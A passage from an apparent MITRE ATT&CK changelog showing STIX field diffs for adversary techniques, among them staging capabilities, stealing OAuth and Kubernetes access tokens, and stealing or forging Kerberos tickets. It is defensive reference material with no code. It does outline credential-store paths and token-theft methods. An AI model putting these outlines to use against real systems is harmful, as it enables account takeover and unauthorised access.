virtual machine is then called to run this code.(Citation: ESET FinFisher Jan 2018) Utilities used to perform software packing are called packers. Example packers are MPRESS and UPX. A more comprehensive list of known packers is available, but adversaries may create their own packing techniques that do not leave the same artifacts as well-known packers to evade defenses.(Citation: Awesome Executable Packing)
external_references[1]['source_name']capecAwesome Executable Packing
external_references[1]['url']https://capec.mitre.org/data/definitions/570.htmlhttps://github.com/dhondta/awesome-executable-packing
external_references[3]['source_name']Wikipedia Exe Compressioncapec
external_references[3]['url']http://en.wikipedia.org/wiki/Executable_compressionhttps://capec.mitre.org/data/definitions/570.html
x_mitre_version1.11.2
iterable_item_added
STIX FieldOld valueNew Value
x_mitre_platformsLinux

[T1608] Stage Capabilities

Current version: 1.2

Version changed from: 1.1 → 1.2


Old Description
New Description
t1Adversaries may upload, install, or otherwise set up capabilt1Adversaries may upload, install, or otherwise set up capabil
>ities that can be used during targeting. To support their op>ities that can be used during targeting. To support their op
>erations, an adversary may need to take capabilities they de>erations, an adversary may need to take capabilities they de
>veloped ([Develop Capabilities](https://attack.mitre.org/tec>veloped ([Develop Capabilities](https://attack.mitre.org/tec
>hniques/T1587)) or obtained ([Obtain Capabilities](https://a>hniques/T1587)) or obtained ([Obtain Capabilities](https://a
>ttack.mitre.org/techniques/T1588)) and stage them on infrast>ttack.mitre.org/techniques/T1588)) and stage them on infrast
>ructure under their control. These capabilities may be stage>ructure under their control. These capabilities may be stage
>d on infrastructure that was previously purchased/rented by >d on infrastructure that was previously purchased/rented by 
>the adversary ([Acquire Infrastructure](https://attack.mitre>the adversary ([Acquire Infrastructure](https://attack.mitre
>.org/techniques/T1583)) or was otherwise compromised by them>.org/techniques/T1583)) or was otherwise compromised by them
> ([Compromise Infrastructure](https://attack.mitre.org/techn> ([Compromise Infrastructure](https://attack.mitre.org/techn
>iques/T1584)). Capabilities can also be staged on web servic>iques/T1584)). Capabilities may also be staged on web servic
>es, such as GitHub or Pastebin.(Citation: Volexity Ocean Lot>es, such as GitHub or Pastebin, or on Platform-as-a-Service 
>us November 2020)  Staging of capabilities can aid the adver>(PaaS) offerings that enable users to easily provision appli
>sary in a number of initial access and post-compromise behav>cations.(Citation: Volexity Ocean Lotus November 2020)(Citat
>iors, including (but not limited to):  * Staging web resourc>ion: Dragos Heroku Watering Hole)(Citation: Malwarebytes Her
>es necessary to conduct [Drive-by Compromise](https://attack>oku Skimmers)(Citation: Netskope GCP Redirection)(Citation: 
>.mitre.org/techniques/T1189) when a user browses to a site.(>Netskope Cloud Phishing)  Staging of capabilities can aid th
>Citation: FireEye CFR Watering Hole 2012)(Citation: Gallaghe>e adversary in a number of initial access and post-compromis
>r 2015)(Citation: ATT ScanBox) * Staging web resources for a>e behaviors, including (but not limited to):  * Staging web 
> link target to be used with spearphishing.(Citation: Malwar>resources necessary to conduct [Drive-by Compromise](https:/
>ebytes Silent Librarian October 2020)(Citation: Proofpoint T>/attack.mitre.org/techniques/T1189) when a user browses to a
>A407 September 2019) * Uploading malware or tools to a locat> site.(Citation: FireEye CFR Watering Hole 2012)(Citation: G
>ion accessible to a victim network to enable [Ingress Tool T>allagher 2015)(Citation: ATT ScanBox) * Staging web resource
>ransfer](https://attack.mitre.org/techniques/T1105).(Citatio>s for a link target to be used with spearphishing.(Citation:
>n: Volexity Ocean Lotus November 2020) * Installing a previo> Malwarebytes Silent Librarian October 2020)(Citation: Proof
>usly acquired SSL/TLS certificate to use to encrypt command >point TA407 September 2019) * Uploading malware or tools to 
>and control traffic (ex: [Asymmetric Cryptography](https://a>a location accessible to a victim network to enable [Ingress
>ttack.mitre.org/techniques/T1573/002) with [Web Protocols](h> Tool Transfer](https://attack.mitre.org/techniques/T1105).(
>ttps://attack.mitre.org/techniques/T1071/001)).(Citation: Di>Citation: Volexity Ocean Lotus November 2020) * Installing a
>giCert Install SSL Cert)> previously acquired SSL/TLS certificate to use to encrypt c
 >ommand and control traffic (ex: [Asymmetric Cryptography](ht
 >tps://attack.mitre.org/techniques/T1573/002) with [Web Proto
 >cols](https://attack.mitre.org/techniques/T1071/001)).(Citat
 >ion: DigiCert Install SSL Cert)
Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedFalse
x_mitre_domains['enterprise-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
modified2021-10-17 16:28:41.815000+00:002022-10-19 22:01:05.551000+00:00
descriptionAdversaries may upload, install, or otherwise set up capabilities that can be used during targeting. To support their operations, an adversary may need to take capabilities they developed ([Develop Capabilities](https://attack.mitre.org/techniques/T1587)) or obtained ([Obtain Capabilities](https://attack.mitre.org/techniques/T1588)) and stage them on infrastructure under their control. These capabilities may be staged on infrastructure that was previously purchased/rented by the adversary ([Acquire Infrastructure](https://attack.mitre.org/techniques/T1583)) or was otherwise compromised by them ([Compromise Infrastructure](https://attack.mitre.org/techniques/T1584)). Capabilities can also be staged on web services, such as GitHub or Pastebin.(Citation: Volexity Ocean Lotus November 2020) Staging of capabilities can aid the adversary in a number of initial access and post-compromise behaviors, including (but not limited to): * Staging web resources necessary to conduct [Drive-by Compromise](https://attack.mitre.org/techniques/T1189) when a user browses to a site.(Citation: FireEye CFR Watering Hole 2012)(Citation: Gallagher 2015)(Citation: ATT ScanBox) * Staging web resources for a link target to be used with spearphishing.(Citation: Malwarebytes Silent Librarian October 2020)(Citation: Proofpoint TA407 September 2019) * Uploading malware or tools to a location accessible to a victim network to enable [Ingress Tool Transfer](https://attack.mitre.org/techniques/T1105).(Citation: Volexity Ocean Lotus November 2020) * Installing a previously acquired SSL/TLS certificate to use to encrypt command and control traffic (ex: [Asymmetric Cryptography](https://attack.mitre.org/techniques/T1573/002) with [Web Protocols](https://attack.mitre.org/techniques/T1071/001)).(Citation: DigiCert Install SSL Cert)Adversaries may upload, install, or otherwise set up capabilities that can be used during targeting. To support their operations, an adversary may need to take capabilities they developed ([Develop Capabilities](https://attack.mitre.org/techniques/T1587)) or obtained ([Obtain Capabilities](https://attack.mitre.org/techniques/T1588)) and stage them on infrastructure under their control. These capabilities may be staged on infrastructure that was previously purchased/rented by the adversary ([Acquire Infrastructure](https://attack.mitre.org/techniques/T1583)) or was otherwise compromised by them ([Compromise Infrastructure](https://attack.mitre.org/techniques/T1584)). Capabilities may also be staged on web services, such as GitHub or Pastebin, or on Platform-as-a-Service (PaaS) offerings that enable users to easily provision applications.(Citation: Volexity Ocean Lotus November 2020)(Citation: Dragos Heroku Watering Hole)(Citation: Malwarebytes Heroku Skimmers)(Citation: Netskope GCP Redirection)(Citation: Netskope Cloud Phishing) Staging of capabilities can aid the adversary in a number of initial access and post-compromise behaviors, including (but not limited to): * Staging web resources necessary to conduct [Drive-by Compromise](https://attack.mitre.org/techniques/T1189) when a user browses to a site.(Citation: FireEye CFR Watering Hole 2012)(Citation: Gallagher 2015)(Citation: ATT ScanBox) * Staging web resources for a link target to be used with spearphishing.(Citation: Malwarebytes Silent Librarian October 2020)(Citation: Proofpoint TA407 September 2019) * Uploading malware or tools to a location accessible to a victim network to enable [Ingress Tool Transfer](https://attack.mitre.org/techniques/T1105).(Citation: Volexity Ocean Lotus November 2020) * Installing a previously acquired SSL/TLS certificate to use to encrypt command and control traffic (ex: [Asymmetric Cryptography](https://attack.mitre.org/techniques/T1573/002) with [Web Protocols](https://attack.mitre.org/techniques/T1071/001)).(Citation: DigiCert Install SSL Cert)
external_references[2]['source_name']FireEye CFR Watering Hole 2012Netskope GCP Redirection
external_references[2]['description']Kindlund, D. (2012, December 30). CFR Watering Hole Attack Details. Retrieved December 18, 2020.Ashwin Vamshi. (2019, January 24). Targeted Attacks Abusing Google Cloud Platform Open Redirection. Retrieved August 18, 2022.
external_references[2]['url']https://www.fireeye.com/blog/threat-research/2012/12/council-foreign-relations-water-hole-attack-details.htmlhttps://www.netskope.com/blog/targeted-attacks-abusing-google-cloud-platform-open-redirection
external_references[3]['source_name']Gallagher 2015Netskope Cloud Phishing
external_references[3]['description']Gallagher, S.. (2015, August 5). Newly discovered Chinese hacking group hacked 100+ websites to use as “watering holes”. Retrieved January 25, 2016.Ashwin Vamshi. (2020, August 12). A Big Catch: Cloud Phishing from Google App Engine and Azure App Service. Retrieved August 18, 2022.
external_references[3]['url']http://arstechnica.com/security/2015/08/newly-discovered-chinese-hacking-group-hacked-100-websites-to-use-as-watering-holes/https://www.netskope.com/blog/a-big-catch-cloud-phishing-from-google-app-engine-and-azure-app-service
external_references[5]['source_name']Malwarebytes Silent Librarian October 2020DigiCert Install SSL Cert
external_references[5]['description']Malwarebytes Threat Intelligence Team. (2020, October 14). Silent Librarian APT right on schedule for 20/21 academic year. Retrieved February 3, 2021.DigiCert. (n.d.). How to Install an SSL Certificate. Retrieved April 19, 2021.
external_references[5]['url']https://blog.malwarebytes.com/malwarebytes-news/2020/10/silent-librarian-apt-phishing-attack/https://www.digicert.com/kb/ssl-certificate-installation.htm
external_references[6]['source_name']Proofpoint TA407 September 2019Gallagher 2015
external_references[6]['description']Proofpoint Threat Insight Team. (2019, September 5). Threat Actor Profile: TA407, the Silent Librarian. Retrieved February 3, 2021.Gallagher, S.. (2015, August 5). Newly discovered Chinese hacking group hacked 100+ websites to use as “watering holes”. Retrieved January 25, 2016.
external_references[6]['url']https://www.proofpoint.com/us/threat-insight/post/threat-actor-profile-ta407-silent-librarianhttp://arstechnica.com/security/2015/08/newly-discovered-chinese-hacking-group-hacked-100-websites-to-use-as-watering-holes/
external_references[7]['source_name']DigiCert Install SSL CertMalwarebytes Heroku Skimmers
external_references[7]['description']DigiCert. (n.d.). How to Install an SSL Certificate. Retrieved April 19, 2021.Jérôme Segura. (2019, December 4). There's an app for that: web skimmers found on PaaS Heroku. Retrieved August 18, 2022.
external_references[7]['url']https://www.digicert.com/kb/ssl-certificate-installation.htmhttps://www.malwarebytes.com/blog/news/2019/12/theres-an-app-for-that-web-skimmers-found-on-paas-heroku
x_mitre_version1.11.2
iterable_item_added
STIX FieldOld valueNew Value
external_references{'source_name': 'Dragos Heroku Watering Hole', 'description': 'Kent Backman. (2021, May 18). When Intrusions Don’t Align: A New Water Watering Hole and Oldsmar. Retrieved August 18, 2022.', 'url': 'https://www.dragos.com/blog/industry-news/a-new-water-watering-hole/'}
external_references{'source_name': 'FireEye CFR Watering Hole 2012', 'description': 'Kindlund, D. (2012, December 30). CFR Watering Hole Attack Details. Retrieved December 18, 2020.', 'url': 'https://www.fireeye.com/blog/threat-research/2012/12/council-foreign-relations-water-hole-attack-details.html'}
external_references{'source_name': 'Malwarebytes Silent Librarian October 2020', 'description': 'Malwarebytes Threat Intelligence Team. (2020, October 14). Silent Librarian APT right on schedule for 20/21 academic year. Retrieved February 3, 2021.', 'url': 'https://blog.malwarebytes.com/malwarebytes-news/2020/10/silent-librarian-apt-phishing-attack/'}
external_references{'source_name': 'Proofpoint TA407 September 2019', 'description': 'Proofpoint Threat Insight Team. (2019, September 5). Threat Actor Profile: TA407, the Silent Librarian. Retrieved February 3, 2021.', 'url': 'https://www.proofpoint.com/us/threat-insight/post/threat-actor-profile-ta407-silent-librarian'}

[T1528] Steal Application Access Token

Current version: 1.2

Version changed from: 1.1 → 1.2


Old Description
New Description
t1Adversaries can steal user application access tokens as a met1Adversaries can steal application access tokens as a means o
>ans of acquiring credentials to access remote systems and re>f acquiring credentials to access remote systems and resourc
>sources. This can occur through social engineering and typic>es.  Application access tokens are used to make authorized A
>ally requires user action to grant access.  Application acce>PI requests on behalf of a user or service and are commonly 
>ss tokens are used to make authorized API requests on behalf>used as a way to access resources in cloud and container-bas
> of a user and are commonly used as a way to access resource>ed applications and software-as-a-service (SaaS).(Citation: 
>s in cloud-based applications and software-as-a-service (Saa>Auth0 - Why You Should Always Use Access Tokens to Secure AP
>S).(Citation: Auth0 - Why You Should Always Use Access Token>Is Sept 2019) OAuth is one commonly implemented framework th
>s to Secure APIs Sept 2019) OAuth is one commonly implemente>at issues tokens to users for access to systems. Adversaries
>d framework that issues tokens to users for access to system> who steal account API tokens in cloud and containerized env
>s. An application desiring access to cloud-based services or>ironments may be able to access data and perform actions wit
> protected APIs can gain entry using OAuth 2.0 through a var>h the permissions of these accounts, which can lead to privi
>iety of authorization protocols. An example commonly-used se>lege escalation and further compromise of the environment.  
>quence is Microsoft's Authorization Code Grant flow.(Citatio>In Kubernetes environments, processes running inside a conta
>n: Microsoft Identity Platform Protocols May 2019)(Citation:>iner communicate with the Kubernetes API server using servic
> Microsoft - OAuth Code Authorization flow - June 2019) An O>e account tokens. If a container is compromised, an attacker
>Auth access token enables a third-party application to inter> may be able to steal the container’s token and thereby gain
>act with resources containing user data in the ways requeste> access to Kubernetes API commands.(Citation: Kubernetes Ser
>d by the application without obtaining user credentials.    >vice Accounts)  Token theft can also occur through social en
>Adversaries can leverage OAuth authorization by constructing>gineering, in which case user action may be required to gran
> a malicious application designed to be granted access to re>t access. An application desiring access to cloud-based serv
>sources with the target user's OAuth token. The adversary wi>ices or protected APIs can gain entry using OAuth 2.0 throug
>ll need to complete registration of their application with t>h a variety of authorization protocols. An example commonly-
>he authorization server, for example Microsoft Identity Plat>used sequence is Microsoft's Authorization Code Grant flow.(
>form using Azure Portal, the Visual Studio IDE, the command->Citation: Microsoft Identity Platform Protocols May 2019)(Ci
>line interface, PowerShell, or REST API calls.(Citation: Mic>tation: Microsoft - OAuth Code Authorization flow - June 201
>rosoft - Azure AD App Registration - May 2019) Then, they ca>9) An OAuth access token enables a third-party application t
>n send a link through [Spearphishing Link](https://attack.mi>o interact with resources containing user data in the ways r
>tre.org/techniques/T1566/002) to the target user to entice t>equested by the application without obtaining user credentia
>hem to grant access to the application. Once the OAuth acces>ls.    Adversaries can leverage OAuth authorization by const
>s token is granted, the application can gain potentially lon>ructing a malicious application designed to be granted acces
>g-term access to features of the user account through [Appli>s to resources with the target user's OAuth token.(Citation:
>cation Access Token](https://attack.mitre.org/techniques/T15> Amnesty OAuth Phishing Attacks, August 2019)(Citation: Tren
>50/001).(Citation: Microsoft - Azure AD Identity Tokens - Au>d Micro Pawn Storm OAuth 2017) The adversary will need to co
>g 2019)  Adversaries have been seen targeting Gmail, Microso>mplete registration of their application with the authorizat
>ft Outlook, and Yahoo Mail users.(Citation: Amnesty OAuth Ph>ion server, for example Microsoft Identity Platform using Az
>ishing Attacks, August 2019)(Citation: Trend Micro Pawn Stor>ure Portal, the Visual Studio IDE, the command-line interfac
>m OAuth 2017)>e, PowerShell, or REST API calls.(Citation: Microsoft - Azur
 >e AD App Registration - May 2019) Then, they can send a [Spe
 >arphishing Link](https://attack.mitre.org/techniques/T1566/0
 >02) to the target user to entice them to grant access to the
 > application. Once the OAuth access token is granted, the ap
 >plication can gain potentially long-term access to features 
 >of the user account through [Application Access Token](https
 >://attack.mitre.org/techniques/T1550/001).(Citation: Microso
 >ft - Azure AD Identity Tokens - Aug 2019)  Application acces
 >s tokens may function within a limited lifetime, limiting ho
 >w long an adversary can utilize the stolen token. However, i
 >n some cases, adversaries can also steal application refresh
 > tokens(Citation: Auth0 Understanding Refresh Tokens), allow
 >ing them to obtain new access tokens without prompting the u
 >ser.    
Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedFalse
x_mitre_domains['enterprise-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
dictionary_item_removed
STIX FieldOld valueNew Value
x_mitre_permissions_required['User']
values_changed
STIX FieldOld valueNew Value
modified2021-04-14 17:56:17.311000+00:002022-04-21 16:25:11.482000+00:00
descriptionAdversaries can steal user application access tokens as a means of acquiring credentials to access remote systems and resources. This can occur through social engineering and typically requires user action to grant access. Application access tokens are used to make authorized API requests on behalf of a user and are commonly used as a way to access resources in cloud-based applications and software-as-a-service (SaaS).(Citation: Auth0 - Why You Should Always Use Access Tokens to Secure APIs Sept 2019) OAuth is one commonly implemented framework that issues tokens to users for access to systems. An application desiring access to cloud-based services or protected APIs can gain entry using OAuth 2.0 through a variety of authorization protocols. An example commonly-used sequence is Microsoft's Authorization Code Grant flow.(Citation: Microsoft Identity Platform Protocols May 2019)(Citation: Microsoft - OAuth Code Authorization flow - June 2019) An OAuth access token enables a third-party application to interact with resources containing user data in the ways requested by the application without obtaining user credentials. Adversaries can leverage OAuth authorization by constructing a malicious application designed to be granted access to resources with the target user's OAuth token. The adversary will need to complete registration of their application with the authorization server, for example Microsoft Identity Platform using Azure Portal, the Visual Studio IDE, the command-line interface, PowerShell, or REST API calls.(Citation: Microsoft - Azure AD App Registration - May 2019) Then, they can send a link through [Spearphishing Link](https://attack.mitre.org/techniques/T1566/002) to the target user to entice them to grant access to the application. Once the OAuth access token is granted, the application can gain potentially long-term access to features of the user account through [Application Access Token](https://attack.mitre.org/techniques/T1550/001).(Citation: Microsoft - Azure AD Identity Tokens - Aug 2019) Adversaries have been seen targeting Gmail, Microsoft Outlook, and Yahoo Mail users.(Citation: Amnesty OAuth Phishing Attacks, August 2019)(Citation: Trend Micro Pawn Storm OAuth 2017)Adversaries can steal application access tokens as a means of acquiring credentials to access remote systems and resources. Application access tokens are used to make authorized API requests on behalf of a user or service and are commonly used as a way to access resources in cloud and container-based applications and software-as-a-service (SaaS).(Citation: Auth0 - Why You Should Always Use Access Tokens to Secure APIs Sept 2019) OAuth is one commonly implemented framework that issues tokens to users for access to systems. Adversaries who steal account API tokens in cloud and containerized environments may be able to access data and perform actions with the permissions of these accounts, which can lead to privilege escalation and further compromise of the environment. In Kubernetes environments, processes running inside a container communicate with the Kubernetes API server using service account tokens. If a container is compromised, an attacker may be able to steal the container’s token and thereby gain access to Kubernetes API commands.(Citation: Kubernetes Service Accounts) Token theft can also occur through social engineering, in which case user action may be required to grant access. An application desiring access to cloud-based services or protected APIs can gain entry using OAuth 2.0 through a variety of authorization protocols. An example commonly-used sequence is Microsoft's Authorization Code Grant flow.(Citation: Microsoft Identity Platform Protocols May 2019)(Citation: Microsoft - OAuth Code Authorization flow - June 2019) An OAuth access token enables a third-party application to interact with resources containing user data in the ways requested by the application without obtaining user credentials. Adversaries can leverage OAuth authorization by constructing a malicious application designed to be granted access to resources with the target user's OAuth token.(Citation: Amnesty OAuth Phishing Attacks, August 2019)(Citation: Trend Micro Pawn Storm OAuth 2017) The adversary will need to complete registration of their application with the authorization server, for example Microsoft Identity Platform using Azure Portal, the Visual Studio IDE, the command-line interface, PowerShell, or REST API calls.(Citation: Microsoft - Azure AD App Registration - May 2019) Then, they can send a [Spearphishing Link](https://attack.mitre.org/techniques/T1566/002) to the target user to entice them to grant access to the application. Once the OAuth access token is granted, the application can gain potentially long-term access to features of the user account through [Application Access Token](https://attack.mitre.org/techniques/T1550/001).(Citation: Microsoft - Azure AD Identity Tokens - Aug 2019) Application access tokens may function within a limited lifetime, limiting how long an adversary can utilize the stolen token. However, in some cases, adversaries can also steal application refresh tokens(Citation: Auth0 Understanding Refresh Tokens), allowing them to obtain new access tokens without prompting the user.
external_references[1]['source_name']Auth0 - Why You Should Always Use Access Tokens to Secure APIs Sept 2019Amnesty OAuth Phishing Attacks, August 2019
external_references[1]['description']Auth0. (n.d.). Why You Should Always Use Access Tokens to Secure APIs. Retrieved September 12, 2019.Amnesty International. (2019, August 16). Evolving Phishing Attacks Targeting Journalists and Human Rights Defenders from the Middle-East and North Africa. Retrieved October 8, 2019.
external_references[1]['url']https://auth0.com/blog/why-should-use-accesstokens-to-secure-an-api/https://www.amnesty.org/en/latest/research/2019/08/evolving-phishing-attacks-targeting-journalists-and-human-rights-defenders-from-the-middle-east-and-north-africa/
external_references[2]['source_name']Microsoft Identity Platform Protocols May 2019Auth0 Understanding Refresh Tokens
external_references[2]['description']Microsoft. (n.d.). Retrieved September 12, 2019.Auth0 Inc.. (n.d.). Understanding Refresh Tokens. Retrieved December 16, 2021.
external_references[2]['url']https://docs.microsoft.com/en-us/azure/active-directory/develop/active-directory-v2-protocolshttps://auth0.com/learn/refresh-tokens/
external_references[3]['source_name']Microsoft - OAuth Code Authorization flow - June 2019Auth0 - Why You Should Always Use Access Tokens to Secure APIs Sept 2019
external_references[3]['description']Microsoft. (n.d.). Microsoft identity platform and OAuth 2.0 authorization code flow. Retrieved September 12, 2019.Auth0. (n.d.). Why You Should Always Use Access Tokens to Secure APIs. Retrieved September 12, 2019.
external_references[3]['url']https://docs.microsoft.com/en-us/azure/active-directory/develop/v2-oauth2-auth-code-flowhttps://auth0.com/blog/why-should-use-accesstokens-to-secure-an-api/
external_references[4]['source_name']Microsoft - Azure AD App Registration - May 2019Trend Micro Pawn Storm OAuth 2017
external_references[4]['description']Microsoft. (2019, May 8). Quickstart: Register an application with the Microsoft identity platform. Retrieved September 12, 2019.Hacquebord, F.. (2017, April 25). Pawn Storm Abuses Open Authentication in Advanced Social Engineering Attacks. Retrieved October 4, 2019.
external_references[4]['url']https://docs.microsoft.com/en-us/azure/active-directory/develop/quickstart-register-apphttps://blog.trendmicro.com/trendlabs-security-intelligence/pawn-storm-abuses-open-authentication-advanced-social-engineering-attacks
external_references[5]['source_name']Microsoft - Azure AD Identity Tokens - Aug 2019Kubernetes Service Accounts
external_references[5]['description']Microsoft. (2019, August 29). Microsoft identity platform access tokens. Retrieved September 12, 2019.Kubernetes. (2022, February 26). Configure Service Accounts for Pods. Retrieved April 1, 2022.
external_references[5]['url']https://docs.microsoft.com/en-us/azure/active-directory/develop/access-tokenshttps://kubernetes.io/docs/tasks/configure-pod-container/configure-service-account/
external_references[6]['source_name']Amnesty OAuth Phishing Attacks, August 2019Microsoft - Azure AD Identity Tokens - Aug 2019
external_references[6]['description']Amnesty International. (2019, August 16). Evolving Phishing Attacks Targeting Journalists and Human Rights Defenders from the Middle-East and North Africa. Retrieved October 8, 2019.Microsoft. (2019, August 29). Microsoft identity platform access tokens. Retrieved September 12, 2019.
external_references[6]['url']https://www.amnesty.org/en/latest/research/2019/08/evolving-phishing-attacks-targeting-journalists-and-human-rights-defenders-from-the-middle-east-and-north-africa/https://docs.microsoft.com/en-us/azure/active-directory/develop/access-tokens
external_references[7]['source_name']Trend Micro Pawn Storm OAuth 2017Microsoft - Azure AD App Registration - May 2019
external_references[7]['description']Hacquebord, F.. (2017, April 25). Pawn Storm Abuses Open Authentication in Advanced Social Engineering Attacks. Retrieved October 4, 2019.Microsoft. (2019, May 8). Quickstart: Register an application with the Microsoft identity platform. Retrieved September 12, 2019.
external_references[7]['url']https://blog.trendmicro.com/trendlabs-security-intelligence/pawn-storm-abuses-open-authentication-advanced-social-engineering-attackshttps://docs.microsoft.com/en-us/azure/active-directory/develop/quickstart-register-app
x_mitre_version1.11.2
iterable_item_added
STIX FieldOld valueNew Value
external_references{'source_name': 'Microsoft - OAuth Code Authorization flow - June 2019', 'description': 'Microsoft. (n.d.). Microsoft identity platform and OAuth 2.0 authorization code flow. Retrieved September 12, 2019.', 'url': 'https://docs.microsoft.com/en-us/azure/active-directory/develop/v2-oauth2-auth-code-flow'}
external_references{'source_name': 'Microsoft Identity Platform Protocols May 2019', 'description': 'Microsoft. (n.d.). Retrieved September 12, 2019.', 'url': 'https://docs.microsoft.com/en-us/azure/active-directory/develop/active-directory-v2-protocols'}
x_mitre_contributorsSuzy Schapperle - Microsoft Azure Red Team
x_mitre_contributorsRam Pliskin, Microsoft Azure Security Center
x_mitre_contributorsJen Burns, HubSpot
x_mitre_platformsContainers

[T1558] Steal or Forge Kerberos Tickets

Current version: 1.4

Version changed from: 1.3 → 1.4


Old Description
New Description
t1Adversaries may attempt to subvert Kerberos authentication bt1Adversaries may attempt to subvert Kerberos authentication b
>y stealing or forging Kerberos tickets to enable [Pass the T>y stealing or forging Kerberos tickets to enable [Pass the T
>icket](https://attack.mitre.org/techniques/T1550/003). Kerbe>icket](https://attack.mitre.org/techniques/T1550/003). Kerbe
>ros is an authentication protocol widely used in modern Wind>ros is an authentication protocol widely used in modern Wind
>ows domain environments. In Kerberos environments, referred >ows domain environments. In Kerberos environments, referred 
>to as “realms”, there are three basic participants: client, >to as “realms”, there are three basic participants: client, 
>service, and Key Distribution Center (KDC).(Citation: ADSecu>service, and Key Distribution Center (KDC).(Citation: ADSecu
>rity Kerberos Ring Decoder) Clients request access to a serv>rity Kerberos Ring Decoder) Clients request access to a serv
>ice and through the exchange of Kerberos tickets, originatin>ice and through the exchange of Kerberos tickets, originatin
>g from KDC, they are granted access after having successfull>g from KDC, they are granted access after having successfull
>y authenticated. The KDC is responsible for both authenticat>y authenticated. The KDC is responsible for both authenticat
>ion and ticket granting.  Attackers may attempt to abuse Ker>ion and ticket granting.  Adversaries may attempt to abuse K
>beros by stealing tickets or forging tickets to enable unaut>erberos by stealing tickets or forging tickets to enable una
>horized access.  On Windows, the built-in <code>klist</code>>uthorized access.  On Windows, the built-in <code>klist</cod
> utility can be used to list and analyze cached Kerberos tic>e> utility can be used to list and analyze cached Kerberos t
>kets.(Citation: Microsoft Klist)  Linux systems on Active Di>ickets.(Citation: Microsoft Klist)  Linux systems on Active 
>rectory domains store Kerberos credentials locally in the cr>Directory domains store Kerberos credentials locally in the 
>edential cache file referred to as the "ccache". The credent>credential cache file referred to as the "ccache". The crede
>ials are stored in the ccache file while they remain valid a>ntials are stored in the ccache file while they remain valid
>nd generally while a user's session lasts.(Citation: MIT cca> and generally while a user's session lasts.(Citation: MIT c
>che) On modern Redhat Enterprise Linux systems, and derivati>cache) On modern Redhat Enterprise Linux systems, and deriva
>ve distributions, the System Security Services Daemon (SSSD)>tive distributions, the System Security Services Daemon (SSS
> handles Kerberos tickets. By default SSSD maintains a copy >D) handles Kerberos tickets. By default SSSD maintains a cop
>of the ticket database that can be found in <code>/var/lib/s>y of the ticket database that can be found in <code>/var/lib
>ss/secrets/secrets.ldb</code> as well as the corresponding k>/sss/secrets/secrets.ldb</code> as well as the corresponding
>ey located in <code>/var/lib/sss/secrets/.secrets.mkey</code> key located in <code>/var/lib/sss/secrets/.secrets.mkey</co
>>. Both files require root access to read. If an adversary i>de>. Both files require root access to read. If an adversary
>s able to access the database and key, the credential cache > is able to access the database and key, the credential cach
>Kerberos blob can be extracted and converted into a usable K>e Kerberos blob can be extracted and converted into a usable
>erberos ccache file that adversaries may use for [Pass the T> Kerberos ccache file that adversaries may use for [Pass the
>icket](https://attack.mitre.org/techniques/T1550/003). The c> Ticket](https://attack.mitre.org/techniques/T1550/003). The
>cache file may also be converted into a Windows format using> ccache file may also be converted into a Windows format usi
> tools such as Kekeo.(Citation: Linux Kerberos Tickets)(Cita>ng tools such as Kekeo.(Citation: Linux Kerberos Tickets)(Ci
>tion: Brining MimiKatz to Unix)(Citation: Kekeo)   Kerberos >tation: Brining MimiKatz to Unix)(Citation: Kekeo)   Kerbero
>tickets on macOS are stored in a standard ccache format, sim>s tickets on macOS are stored in a standard ccache format, s
>ilar to Linux. By default, access to these ccache entries is>imilar to Linux. By default, access to these ccache entries 
> federated through the KCM daemon process via the Mach RPC p>is federated through the KCM daemon process via the Mach RPC
>rotocol, which uses the caller's environment to determine ac> protocol, which uses the caller's environment to determine 
>cess. The storage location for these ccache entries is influ>access. The storage location for these ccache entries is inf
>enced by the <code>/etc/krb5.conf</code> configuration file >luenced by the <code>/etc/krb5.conf</code> configuration fil
>and the <code>KRB5CCNAME</code> environment variable which c>e and the <code>KRB5CCNAME</code> environment variable which
>an specify to save them to disk or keep them protected via t> can specify to save them to disk or keep them protected via
>he KCM daemon. Users can interact with ticket storage using > the KCM daemon. Users can interact with ticket storage usin
><code>kinit</code>, <code>klist</code>, <code>ktutil</code>,>g <code>kinit</code>, <code>klist</code>, <code>ktutil</code
> and <code>kcc</code> built-in binaries or via Apple's nativ>>, and <code>kcc</code> built-in binaries or via Apple's nat
>e Kerberos framework. Adversaries can use open source tools >ive Kerberos framework. Adversaries can use open source tool
>to interact with the ccache files directly or to use the Ker>s to interact with the ccache files directly or to use the K
>beros framework to call lower-level APIs for extracting the >erberos framework to call lower-level APIs for extracting th
>user's TGT or Service Tickets.(Citation: SpectorOps Bifrost >e user's TGT or Service Tickets.(Citation: SpectorOps Bifros
>Kerberos macOS 2019)(Citation: macOS kerberos framework MIT)>t Kerberos macOS 2019)(Citation: macOS kerberos framework MI
> >T) 
Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_domains['enterprise-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
modified2021-10-14 22:56:22.054000+00:002022-03-08 21:45:01.934000+00:00
descriptionAdversaries may attempt to subvert Kerberos authentication by stealing or forging Kerberos tickets to enable [Pass the Ticket](https://attack.mitre.org/techniques/T1550/003). Kerberos is an authentication protocol widely used in modern Windows domain environments. In Kerberos environments, referred to as “realms”, there are three basic participants: client, service, and Key Distribution Center (KDC).(Citation: ADSecurity Kerberos Ring Decoder) Clients request access to a service and through the exchange of Kerberos tickets, originating from KDC, they are granted access after having successfully authenticated. The KDC is responsible for both authentication and ticket granting. Attackers may attempt to abuse Kerberos by stealing tickets or forging tickets to enable unauthorized access. On Windows, the built-in klist utility can be used to list and analyze cached Kerberos tickets.(Citation: Microsoft Klist) Linux systems on Active Directory domains store Kerberos credentials locally in the credential cache file referred to as the "ccache". The credentials are stored in the ccache file while they remain valid and generally while a user's session lasts.(Citation: MIT ccache) On modern Redhat Enterprise Linux systems, and derivative distributions, the System Security Services Daemon (SSSD) handles Kerberos tickets. By default SSSD maintains a copy of the ticket database that can be found in /var/lib/sss/secrets/secrets.ldb as well as the corresponding key located in /var/lib/sss/secrets/.secrets.mkey. Both files require root access to read. If an adversary is able to access the database and key, the credential cache Kerberos blob can be extracted and converted into a usable Kerberos ccache file that adversaries may use for 